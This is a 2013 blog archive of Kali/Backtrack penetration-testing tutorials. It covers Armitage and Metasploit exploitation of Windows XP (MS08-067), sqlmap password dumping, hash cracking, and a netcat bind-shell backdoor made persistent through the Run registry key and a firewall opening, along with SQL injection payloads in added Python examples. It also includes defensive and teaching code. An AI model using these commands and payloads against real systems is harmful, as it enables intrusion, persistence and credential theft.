Showing posts with label Backtrack.

Thursday, May 9, 2013

Hacking With Armitage on Kali Linux / Backtrack

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

If you are just beginning to learn, Armitage is not something you would want to start with. It is fine for quickly automating routine Metasploit tasks, but if you are trying to learn, Armitage adds a layer of abstraction, hides what is actually happening, and makes you a perfect script kiddie.

Learning the basics in 'msfconsole' or 'msfcli' before moving on to Armitage is a better approach in my opinion.

The tool is mostly self-explanatory due to its GUI.

Here, I am simulating an attack on a Windows XP system using Armitage on Kali Linux.

Bring up Armitage by typing:
#service postgresql start
#armitage
First, I need to 'discover' this host.
Hosts -> nmap scan
OR, I could manually 'add host' by providing its IP.
 
Now I can see this Windows XP host in the Armitage workspace. From here I could manually search for vulnerabilities in the Windows XP host and then try to exploit them, but I chose the easy way on Armitage, which is 'Hail Mary'.
Attacks -> Hail Mary
It launched every exploit matching the services found on the victim machine and, once one succeeded, drew the host in red with lightning bolts, which means a session was opened on it. Hail Mary is noisy and can crash fragile services, so on a real engagement it is a last resort rather than a first step.



I grab the password hashes that I can try to crack later on.



I gain access to cmd.exe 'command prompt' in windows.




I set up a persistent Meterpreter backdoor on the hacked Windows XP host for later access.




I view the processes running on hacked machine.




I take screenshots of activities on the hacked machine.




 I tried connecting with VNC viewer to the remote machine.






If you are part of a pen test team, one of you can host an Armitage team server and the others can 'connect' to it, so that you can collaborate on the project. The host runs Armitage's teamserver script with its external IP address and a shared password; everyone then works against the same Metasploit instance and sees the same hosts and sessions.

At the connect window, you need to enter the host name of the fellow Pen Tester hosting the Armitage server, the port number, and the username and password that he/she has provided you.



At the next window, confirm the fingerprint.




Pick a 'Handle' for the session.



And then you can join your pen test team and work on the project together.


There's a bunch of other stuff you could do with Armitage, please feel free to explore further.

Friday, May 3, 2013

How To Hack A Website - Simple Demo | Kali Linux / BackTrack | Pranshu

Written by: Pranshu Bajpai


I was testing for SQL vulnerabilities at random over the Internet and found a whole lot of websites that are still vulnerable to SQL injection. I refrained from any further testing due to lack of explicit permission from the owners. However, here's a demonstration, from one of my penetration testing projects, of how these websites may be hacked if the SQL vulnerabilities are left unpatched.

Tip: Read up a little on SQL injection. For example, start with figuring out what this is trying to do:
SELECT * FROM users WHERE name = '' OR '1'='1';
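To see why that query matters, here is an added example (not part of the original post) that builds the vulnerable lookup the way a careless PHP script would, string-concatenating the user-supplied name into the SQL text, and puts the parameterised version beside it. The table, the rows and the column names are constructed for this example and stand in for the site's real backend; SQLite is used so it runs anywhere, but the behaviour is the same on MySQL.

```python
import sqlite3

# Constructed sample data standing in for the website's member table.
# Table and column names are assumptions for this example.
ROWS = [("alice", "s3cret"), ("bob", "hunter2"), ("admin", "P@ssw0rd")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, name):
    # The attacker controls `name` and it is spliced straight into the SQL
    # text. This is exactly the kind of dynamic parameter sqlmap probes for.
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, name):
    # Parameterised query: the driver sends `name` as data, never as SQL, so
    # the quote and the OR in a payload are just characters in a string.
    sql = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


# The tip's payload: closes the string literal and appends an always-true
# condition, turning "find this one user" into "return every user".
PAYLOAD = "' OR '1'='1"

# A UNION payload of the kind sqlmap uses to pull other columns (here the
# password column) out through the same injection point.
UNION_PAYLOAD = "' UNION SELECT password FROM users WHERE '1'='1"
```

Run `lookup_vulnerable(make_db(), PAYLOAD)` and every name comes back; run `lookup_safe(make_db(), PAYLOAD)` and nothing does, because no user is literally named `' OR '1'='1`. The UNION payload against the vulnerable function returns the password column, which is the step sqlmap automates when it dumps a table.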


The tool sqlmap comes preinstalled on both Kali and Backtrack.

You point it at a URL with a dynamic parameter (for example an id in the query string of a PHP script). If that parameter is injectable, sqlmap detects which injection technique works and uses it to run its own queries against the backend database.

I've blacked out the website's information for obvious reasons.

First, get the tool to list the available databases (sqlmap's --dbs option):



The 'information_schema' database is MySQL's metadata catalogue (it describes the other databases), so I'm not interested in that one. The other one is my target.

I grab the tables available in that database (-D <database> --tables):


A bunch of tables get listed; among them the table 'members' looks interesting, so I grab its columns (-D <database> -T members --columns):

And I see a column with passwords, so I dump it (--dump). I've seen web admins careless enough to store passwords in plaintext, in which case no cracking is required at all:



Finally, I have the password hashes and the cracking begins (John the Ripper, 'jtr'). Hashes are not reversed: the cracker hashes candidate passwords and compares the results against the dump, so weak passwords fall quickly and strong ones may not fall at all:


Unless you actually know what sqlmap did for you in the background, it is not that interesting and makes you a perfect script kiddie.

Once you crack an admin's password hash, you can log in to the website's control panel as 'admin' and edit the HTML files (index.html for the homepage). That is website defacement.

Disclaimer: As stated in the beginning, this excerpt is from an authorized penetration test. If you notice an SQL weakness in a website, please refrain from engaging in illicit activities and inform the web administrator.

Sunday, April 14, 2013

Using ophcrack in Kali Linux / Backtrack to Crack Hashes | Pranshu

Written by: Pranshu Bajpai


Ophcrack is a GUI tool for cracking password hashes. Its main attraction is its ability to use rainbow tables, which makes cracking Windows LM and NT hashes far faster than plain brute force.

At this point it is essential to understand what rainbow tables buy you. A hash is a one-way function, so you cannot convert a password hash back to its plaintext. A brute-force or dictionary attack therefore takes each candidate passphrase, hashes it, and compares the result with the captured hash; a match means the candidate is the password. Almost all of the time and CPU in that attack goes into computing hashes. Rainbow tables are a time-memory trade-off: the hashes are computed once, in advance, and stored compactly as chains of (start, end) points, so at crack time you mostly look up rather than compute, and recover the plaintext after a bounded number of hash operations. Two caveats: a table only covers the character set and password length it was generated for, and it only works against unsalted hash formats. LM and NT hashes are unsalted, which is why they are the classic target; a salted hash would need a separate table per salt.
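The chain mechanics are easier to see in code than in prose, so here is an added example (not from the original post or from Ophcrack) of a toy rainbow table: 4-digit PINs hashed with unsalted MD5 stand in for LM/NT hashes, chains are 100 steps long, and only each chain's start and end point are stored. The keyspace, chain length and starting points are all constructed for this example; real tables use the same mechanics over a far larger space.

```python
import hashlib

# Toy parameters (constructed for this example): 4-digit PINs under unsalted
# MD5 stand in for LM/NT hashes, which are likewise unsalted.
SPACE = 10_000          # candidate plaintexts "0000" .. "9999"
CHAIN_LEN = 100         # plaintexts covered by each stored (start, end) pair


def h(pin: str) -> str:
    return hashlib.md5(pin.encode()).hexdigest()


def reduce_step(hash_hex: str, step: int) -> str:
    # Map a hash back into the keyspace. Mixing in the step index is what
    # makes this a *rainbow* table: chains that collide at different
    # positions do not merge into one.
    return f"{(int(hash_hex, 16) + step) % SPACE:04d}"


def walk_chain(start: str):
    """Return the CHAIN_LEN plaintexts covered by the chain beginning at start."""
    pins = [start]
    for step in range(CHAIN_LEN - 1):
        pins.append(reduce_step(h(pins[-1]), step))
    return pins


def build_table(starts):
    # Precomputation. Only the start and the final end point of each chain
    # are kept; the intermediate plaintexts are recomputed on demand.
    table = {}
    for start in starts:
        pins = walk_chain(start)
        end = reduce_step(h(pins[-1]), CHAIN_LEN - 1)
        table.setdefault(end, []).append(start)
    return table


def lookup(table, target_hash: str):
    """Recover the plaintext for target_hash, or None if no chain covers it."""
    for pos in range(CHAIN_LEN):
        # Assume the target sits at position `pos` of some chain and walk the
        # remaining reductions to that chain's end point.
        cur = reduce_step(target_hash, pos)
        for step in range(pos + 1, CHAIN_LEN):
            cur = reduce_step(h(cur), step)
        for start in table.get(cur, ()):
            # Re-walk the chain and verify: an end-point match can be a false
            # alarm because reduce_step() is not injective.
            candidate = walk_chain(start)[pos]
            if h(candidate) == target_hash:
                return candidate
    return None


# Constructed starting points; "1234" is included so its chain is known to
# be in the table.
STARTS = [f"{(i * 7919) % SPACE:04d}" for i in range(200)] + ["1234"]
TABLE = build_table(STARTS)
```

Each lookup costs at most a few thousand hashes instead of the ten thousand a full brute force would need, and the table holds 201 pairs instead of 10,000 hashes. Note what happens with a salt: `lookup(TABLE, h("salt:1234"))` returns None, because no chain in the table was ever built over salted inputs. That is the whole reason unsalted LM and NT hashes are the natural target for Ophcrack.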

Here's an example where I cracked some LM Hashes I grabbed from a machine during penetration testing (the hashes were obtained by using pwdump in Meterpreter).



You can load up any of these rainbow tables germane to the victim's OS. Click on 'install' to obtain them. They are large files and will take a while to download depending on your network bandwidth.


Ophcrack can speed up Windows password cracking considerably, and if you test Windows systems frequently it is prudent to keep these rainbow tables on local disk. Note that LM hashes are stored by default only on Windows XP/2003 and earlier; Vista and later keep only NT hashes unless LM storage has been explicitly re-enabled, so against newer targets it is the NT tables you will need.

Friday, April 12, 2013

Hacking with Meterpreter Session on Kali linux / Backtrack | Post Exploitation

Written by: Pranshu Bajpai

In my last post I demonstrated how a vulnerable system can be discovered quickly with nmap, using the script 'smb-check-vulns.nse' from the 'vuln' category in 'unsafe' mode, which is very likely to crash the victim machine.

In this one, I exploit that system using Metasploit and obtain a meterpreter session:


We need to set RHOST (the target), the PAYLOAD (for example windows/meterpreter/reverse_tcp) and LHOST (the attacker's address that the payload connects back to). The standard Metasploit command 'exploit' then runs the module with these options. For the MS08-067 host found in the previous post, the module is exploit/windows/smb/ms08_067_netapi.

Now:

- We can dump the password hashes of this system (hashdump).

- We can upload and execute nc.exe (netcat) on the hacked system to get back in later (a backdoor).

Uploading Netcat on Hacked Machine as a Backdoor | Kali Linux / Backtrack | Post Exploitation

Written by: Pranshu Bajpai

Netcat, the swiss army knife, can be used as a backdoor, but I would advise against it because it has no authentication and no encryption: anyone who finds the netcat listener on the victim's computer can control that machine, and everything you type to it crosses the network in the clear.

First, upload netcat to the remote machine (it is at /usr/share/windows-binaries/nc.exe on Kali Linux and Backtrack).

Next, enumerate the values under the Run key (HKLM\Software\Microsoft\Windows\CurrentVersion\Run). Anything listed there is executed each time a user logs on, which is what gives the backdoor persistence across reboots.


Now use 'reg setval' to add a value under that Run key on the victim's machine, pointing at nc.exe together with its listener arguments.

Then use 'reg queryval' to confirm it was added.

Use 'netsh firewall add portopening' in a Windows command shell to open TCP port 455 in the Windows Firewall (where netcat will listen); otherwise the inbound connection is silently dropped.


Execute nc.exe from Meterpreter, passing the same listener arguments that were stored in the Run key, so that it detaches from the console and serves cmd.exe on port 455:
meterpreter > execute -f nc.exe -a "-Ldp 455 -e cmd.exe"
Now you will see nc.exe as a process on the victim's machine, and you can connect to it from your box with nc <victim IP> 455.
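Since this persistence trick is also one of the first things an incident responder looks for, here is the defender's side as an added example (not part of the original post): a small checker that parses the output of `reg query` against the Run key and flags entries that look like a netcat-style bind shell. The registry dump below is constructed for this example; the value names and paths are made up, with the post's nc.exe entry among them.

```python
import re

# Constructed sample in the format printed by
#   reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
# All three entries are made up for this example.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe
    updater    REG_SZ    C:\Users\Public\svchost.exe -L -p 4444 -e cmd.exe
"""

# reg query separates the value name, type and data with four spaces.
ENTRY_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.+)$")

# Indicators of a bind shell: a netcat binary name outright, or a listen
# flag (-l / -L, possibly bundled as in -Ldp) followed by -e <program>.
NETCAT_NAMES = ("nc.exe", "ncat.exe", "netcat.exe")
BIND_SHELL_RE = re.compile(r"-[a-zA-Z]*[lL][a-zA-Z]*\b.*-e\s+\S+")


def parse_run_entries(text):
    """Return (value_name, command) pairs from reg query output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m["name"].strip(), m["data"].strip()))
    return entries


def suspicious_run_entries(text):
    """Return the Run-key entries that look like netcat-style persistence."""
    flagged = []
    for name, cmd in parse_run_entries(text):
        lower = cmd.lower()
        if any(n in lower for n in NETCAT_NAMES) or BIND_SHELL_RE.search(cmd):
            flagged.append((name, cmd))
    return flagged
```

The second flagged entry shows why matching on the file name alone is not enough: a renamed netcat still carries its listen-and-execute arguments on the command line. In practice you would feed this the output of `reg query` for both the HKLM and HKCU Run and RunOnce keys.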




Using nmap 'Script' to Quickly Scan for One Particular Vulnerability (MS08-067) | Kali Linux / Backtrack

Written by: Pranshu Bajpai

I usually scan for vulnerabilities with the Nessus scanner, but it is big and heavy and takes time to check hosts for every vulnerability its plugins know about. Nessus can be told to scan for one particular vulnerability, but here I discuss a quicker way to do it.

A time came when the trustworthy MS08-067 NetApi vulnerability became my favorite when hunting for vulnerable XP boxes during a penetration test. It is reliable and always gave me root access on the compromised machine without crashing it. So I started looking for a way to quickly scan test networks for a computer with the MS08-067 vulnerability before I moved on to others.

I discovered that it can be done with the Nmap Scripting Engine:
# nmap -oA 192168-filename -sS -p445 --script smb-check-vulns.nse 172.19.8.0/24 --script-args=unsafe=1


Be careful with the 'unsafe' option: it enables checks that are likely to crash the victim machine. After the scan completed, I found a vulnerable system. Note that the script also tests for the presence of a Conficker worm infection. In current Nmap releases (6.49 and later) smb-check-vulns has been split into separate smb-vuln-* scripts (smb-vuln-ms08-067, smb-vuln-conficker and others), so on an up-to-date Kali use those names instead.
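The -oA option above also writes the results as XML, which is the form you want when scanning a whole /24 and only care about which hosts came back VULNERABLE. Here is an added example (not from the original post) that parses that XML and picks out the hosts per check. The nmap output below is constructed for this example: the addresses and results are made up, but the element layout (host, address, hostscript/script with the script's text in the output attribute, newlines escaped as &#xa;) is the one nmap writes.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output for the smb-check-vulns scan above.
# Hosts and results are made up for this example.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sS -p445 --script smb-check-vulns.nse --script-args=unsafe=1 172.19.8.0/24">
  <host>
    <status state="up"/><address addr="172.19.8.23" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <hostscript><script id="smb-check-vulns" output="&#xa;  MS08-067: VULNERABLE&#xa;  Conficker: Likely CLEAN&#xa;  regsvc DoS: NOT VULNERABLE"/></hostscript>
  </host>
  <host>
    <status state="up"/><address addr="172.19.8.40" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <hostscript><script id="smb-check-vulns" output="&#xa;  MS08-067: NOT VULNERABLE&#xa;  Conficker: Likely INFECTED&#xa;  regsvc DoS: NOT VULNERABLE"/></hostscript>
  </host>
  <host>
    <status state="up"/><address addr="172.19.8.7" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="closed"/></port></ports>
  </host>
</nmaprun>
"""


def script_results(xml_text, script_id="smb-check-vulns"):
    """Map each host's IPv4 address to {check: status} parsed from the script output.

    Hosts without a result for script_id (port closed, host down) are omitted.
    """
    results = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        script = host.find(f"hostscript/script[@id='{script_id}']")
        if addr_el is None or script is None:
            continue
        checks = {}
        # Each line of the script output is "<check>: <status>".
        for line in script.get("output", "").splitlines():
            if ":" in line:
                check, status = line.split(":", 1)
                checks[check.strip()] = status.strip()
        results[addr_el.get("addr")] = checks
    return results


def hosts_with(results, check, status):
    """Addresses whose result for `check` is exactly `status` (e.g. VULNERABLE)."""
    return sorted(addr for addr, checks in results.items() if checks.get(check) == status)
```

Matching the status exactly matters: "NOT VULNERABLE" contains the word VULNERABLE, so a naive substring search would report every host that was checked. For the newer smb-vuln-* scripts pass their script id instead and adjust the line parsing to their table-style output.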



After discovering the vulnerability, I penetrated the system, planted the classic Netcat backdoor on it and then hid the backdoor using the Aphex rootkit.


How to Change your Mac / Hardware Address in Kali Linux / Backtrack

Written by: Pranshu Bajpai

Macchanger is a tool already available in Kali Linux and Backtrack. It lets you change the hardware (MAC) address of a particular interface on your machine. For instance, with 'eth0' and 'wlan0' as the wired and wireless interfaces respectively, here is how you would use it:


Here, the option '-r' tells macchanger to use a fully random MAC address. '-A' sets a random address with the vendor prefix (OUI) of any kind of device, while '-a' sets a random vendor prefix of the same kind of device as the current one.

You can also specify the exact MAC address you want with the option '-m', as shown in the figure.

If you want the interface to come up with a chosen address on every boot, add a pre-up line to its stanza in '/etc/network/interfaces':
pre-up ifconfig eth0 hw ether 02:00:00:00:00:01
Replace the example address with the one you want. It must be a unicast address and must not be all zeros: the kernel rejects 00:00:00:00:00:00, so that value cannot be used here. This gives the interface the same fixed address on every boot; for a fresh random address each time, call macchanger -r eth0 from the same pre-up hook instead.

Update: If you get an error while trying to spoof your MAC address with macchanger, it is probably because you are trying to change the hardware address of the interface while it is 'up'. This is similar to trying to change a car's tire while it is in motion; maybe not the best example, but you get the idea. Put the interface 'down' first, change the hardware address with macchanger, then bring it 'up' again. If NetworkManager manages the interface it may bring it back up behind you or reapply its own settings, so either disable it for that interface or use its own cloned-MAC option instead.
#ifconfig wlan0 down
#macchanger -r wlan0
#ifconfig wlan0 up
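Two details decide whether a spoofed address is accepted: the lowest bit of the first octet must be 0 (unicast, not multicast) and the address must not be all zeros. The second-lowest bit marks a "locally administered" address, the honest way to flag a made-up MAC. Here is an added example (not part of the original post or of macchanger) that checks those rules and generates random addresses the way the -r and -e style options do: either fully random with the locally administered bit set, or random with a vendor prefix kept. The sample OUI 00:0c:29 and the addresses in the notes are assumptions for the example.

```python
import re
import secrets

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$", re.IGNORECASE)


def parse_mac(mac: str) -> bytes:
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return bytes(int(octet, 16) for octet in mac.split(":"))


def format_mac(raw) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def is_multicast(raw) -> bool:
    # Bit 0 of the first octet: 1 = group/multicast, 0 = unicast.
    return bool(raw[0] & 0x01)


def is_locally_administered(raw) -> bool:
    # Bit 1 of the first octet: 1 = not assigned by a vendor (spoofed/virtual).
    return bool(raw[0] & 0x02)


def is_valid_unicast(mac: str) -> bool:
    """The kernel's acceptance rule: not all zeros and not a multicast address."""
    raw = parse_mac(mac)
    return any(raw) and not is_multicast(raw)


def random_mac(keep_oui_from=None) -> str:
    """Generate a usable unicast MAC.

    With keep_oui_from, keep that address's 3-byte vendor prefix and randomise
    only the device part (like macchanger -e). Otherwise the whole address is
    random and the locally administered bit is set (an honest spoofed address).
    """
    raw = bytearray(secrets.token_bytes(6))
    if keep_oui_from:
        raw[:3] = parse_mac(keep_oui_from)[:3]
    else:
        raw[0] = (raw[0] & 0xFE) | 0x02   # clear multicast bit, set local bit
    raw[0] &= 0xFE                        # never emit a multicast address
    return format_mac(raw)
```

`is_valid_unicast("00:00:00:00:00:00")` is False, which is why the all-zero address fails when set with ifconfig. A randomly chosen first octet would be multicast half the time, so any generator, macchanger included, has to clear that bit before handing the address to the kernel.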

Wednesday, April 10, 2013

Using nbtscan in Kali Linux / Backtrack to Quickly scan for Hosts Alive

Written by: Pranshu Bajpai

'nbtscan' is a quick tool that gives near-instant results on which hosts on your network are alive and replying to NetBIOS name queries. Note that it only finds hosts that answer NetBIOS over UDP port 137 (typically Windows boxes and Samba servers); a host with that port filtered will not show up even though it is alive.

Here, I have scanned a range of IPs to see which ones are up:



Notice the '/24' at the end of the target (the address ends in '.1/24'). An IPv4 address is 32 bits long, so '/24' means 'keep the first 24 bits fixed and vary the remaining 8', and nbtscan walks all 256 addresses of that block (.0 through .255, of which 254 are usable host addresses). Equivalently, I could write the last octet as a range, '1-254', instead of using '/24'. Try '/16' instead and see how many addresses that covers (65,536).
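To make the notation concrete, here is an added example (not from the original post or from nbtscan) that expands both target forms nbtscan accepts, CIDR and a last-octet range, into the individual addresses using the standard library's ipaddress module. The example addresses are assumptions; the point is the counts.

```python
import ipaddress


def expand_targets(spec: str):
    """Expand an nbtscan-style target spec into a list of IPv4 address strings.

    Accepts CIDR ("192.168.1.1/24"; host bits are allowed, as nbtscan allows)
    and the last-octet range form ("192.168.1.1-254"). IPv4 only.
    """
    if "/" in spec:
        # strict=False lets a host address stand for its network, so
        # 192.168.1.1/24 expands to 192.168.1.0 .. 192.168.1.255.
        net = ipaddress.ip_network(spec, strict=False)
        return [str(addr) for addr in net]
    if "-" in spec:
        base, last = spec.rsplit("-", 1)
        prefix, first = base.rsplit(".", 1)
        first, last = int(first), int(last)
        if not 0 <= first <= last <= 255:
            raise ValueError(f"bad octet range in {spec!r}")
        return [f"{prefix}.{i}" for i in range(first, last + 1)]
    # A bare address is a range of one.
    return [str(ipaddress.ip_address(spec))]


def prefix_to_netmask(prefix_len: int) -> str:
    """The dotted mask for a /N prefix, e.g. 24 -> 255.255.255.0."""
    return str(ipaddress.ip_network(f"0.0.0.0/{prefix_len}").netmask)
```

`len(expand_targets("192.168.1.1/24"))` is 256 and `len(expand_targets("192.168.1.1/16"))` is 65,536, which is also why a /16 nbtscan takes so much longer than a /24.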

Read more on CIDR Notation to understand this further.

Monday, April 8, 2013

Using Nessus in Kali Linux / Backtrack To Scan For Vulnerabilities | How To

Written by: Pranshu Bajpai

Read my post on setting up Nessus if you haven't got it set up yet.

After logging into Nessus, go to 'Scans' -> 'Create new scan'.

Here, give a name to the scan (I usually use current Date).

'Run now' (or schedule scan for later).

Type of scan -> select 'Internal network scan' for a scan of your local network.

Give it a host address (192.168.0.10), a host range (192.168.0.1/24) or a host list file.

Initiate the scan and wait while it populates the vulnerabilities found on the scanned hosts.

It can give you a host summary like this:





Or you can sort the vulnerabilities by decreasing severity:





After the Scan, move to the 'Results' Page:



You can also 'Export' the results in various formats such as '.nessus', PDF or HTML:


Logout of Nessus after you are done.

Sunday, April 7, 2013

Using Tor and Privoxy on Kali / Debian / Backtrack Linux To Anonymize Internet Surfing or Open Blocked Websites

Written by: Pranshu Bajpai

Freedom of expression and speech is your fundamental right, and if they try to take that away from you by blocking access to specific websites, then the tools mentioned in this post will aid you in defeating censorship.

They recently blocked websites like HackThisSite on the network that I use, categorizing them as "Hacking". Their intentions are good, I'm sure, but I need to visit such websites.




Anyway, I decided to use a proxy website (which is not always reliable, since they will block access to those as well). As I suspected, it was blocked under 'Proxy Avoidance'.



Set up the onion router to get around this. First, you need to install it on your box using the following command:
# apt-get install tor privoxy
This will install 2 separate packages 'Tor' and 'Privoxy'.

Tor listens on your machine on port 9050 as a SOCKS proxy (SOCKS4, SOCKS4a and SOCKS5 are all accepted).

Privoxy will host a proxy service on your machine on port 8118 of type 'HTTP'

Also install Vidalia, the GUI for Tor:
# apt-get install vidalia polipo
(polipo is another small caching HTTP proxy; with Privoxy doing the forwarding below, it is not used in this setup.)
 Now, edit the Privoxy configuration file:
# vi /etc/privoxy/config
Add this line at the bottom of this file:
forward-socks4a / localhost:9050 .
Save and close the file. This tells Privoxy to forward every request it receives to the SOCKS4a listener on port 9050 on localhost, which is Tor. SOCKS4a (unlike plain SOCKS4) passes the hostname through to Tor, so DNS resolution happens inside the Tor network rather than through your local resolver, which would otherwise reveal the sites you visit to the network operator.

Time to fire up Tor and privoxy services:
# /etc/init.d/tor start
# /etc/init.d/privoxy start
Now goto Application -> Internet -> Vidalia

Check that it says 'connected to tor network'

You can click on 'view the network' to see all the relays that you are passing through.

Now go to your browser and point it at the proxy chain you just built. To go through Privoxy (which also does content filtering), set an HTTP proxy; to talk to Tor directly, set a SOCKS5 proxy and enable the browser's 'Proxy DNS when using SOCKS v5' option so that hostnames are resolved through Tor rather than locally:

Proxy IP - '127.0.0.1'
Proxy port - 8118 (HTTP, via Privoxy) or 9050 (SOCKS5, direct to Tor)
Type - HTTP or SOCKS5 accordingly

Note: If you are using the FireFox or Iceweasel browser, you can use 'AutoProxy' add-on to set this up.



Reload the website that was blocked earlier, if you've done it right, you should have access to it.



Your browsing now leaves your network through Tor: the destination site sees a Tor exit relay's address instead of yours, and the local network sees only an encrypted connection to a Tor relay. That is not the same as being anonymous. Cookies, logged-in accounts, browser fingerprinting, and plugins such as Flash that ignore the browser's proxy settings can all still identify you, and any non-HTTPS traffic is readable by the exit relay.

Thursday, March 21, 2013

Installing Flash Player on Backtrack or Kali Linux


By default the browser gives a 'flash plugin required' error when you try to open Flash videos on Backtrack or Kali Linux. It doesn't take much to fix that. (Note that Flash Player reached end of life in December 2020 and current browsers no longer load NPAPI plugins at all, so these steps apply to the browsers of the time, not to a present-day Kali.)
Get the latest install_flash_player_....tar.gz from adobe (the tarball)
Then Follow these steps mentioned on backtrack website:
root@bt:~# mkdir -p ~/.mozilla/plugins
root@bt:~# mkdir flash
root@bt:~# mv -f install_flash_player_11_linux.i386.tar.gz flash/
root@bt:~# cd flash/
root@bt:~/flash# tar xvfz install_flash_player_11_linux.i386.tar.gz
root@bt:~/flash# cp -f libflashplayer.so ~/.mozilla/plugins/

Restart your Browser and your flash player should work fine now.

 

Additional instructions for Kali Linux

1. Simply download the 'install_flash_.....tar.gz' file from the get.adobe.com

2. Extract:
#tar -xvzf install_flash_.......tar.gz

3. Move the libflashplayer.so plugin to '/usr/lib/mozilla/plugins/'
#mv libflashplayer.so /usr/lib/mozilla/plugins/

Restart your Browser and your flash player should work fine now.